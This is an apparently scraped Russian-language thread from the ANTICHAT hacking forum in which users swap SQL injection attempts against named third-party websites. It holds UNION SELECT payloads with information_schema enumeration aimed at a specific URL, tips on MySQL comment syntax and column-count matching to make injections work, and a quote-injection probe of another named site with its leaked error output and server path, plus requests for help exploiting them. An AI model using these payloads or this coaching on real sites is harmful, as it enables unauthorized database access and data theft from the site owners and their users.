ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.

Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.

Чего опять ему надо ?((

http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version( ),3,4-- (безрезультатно()

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.--
тоже /=

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.+limit+1,1--

даже версию не посмотреть(

mysql error: The used SELECT statements have a different number of columns

читай Сначала кол-во колонок подбери

Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
------------------------------------
Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!!

geforse
помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:

5 ветка..
с правами

как раскрутить?

http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1

Sanic1977
никак нема иьекта )

инъект отсутствует

http://www.comingsoon.net/news.php?id=1'

Получил вот такой ответ

Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.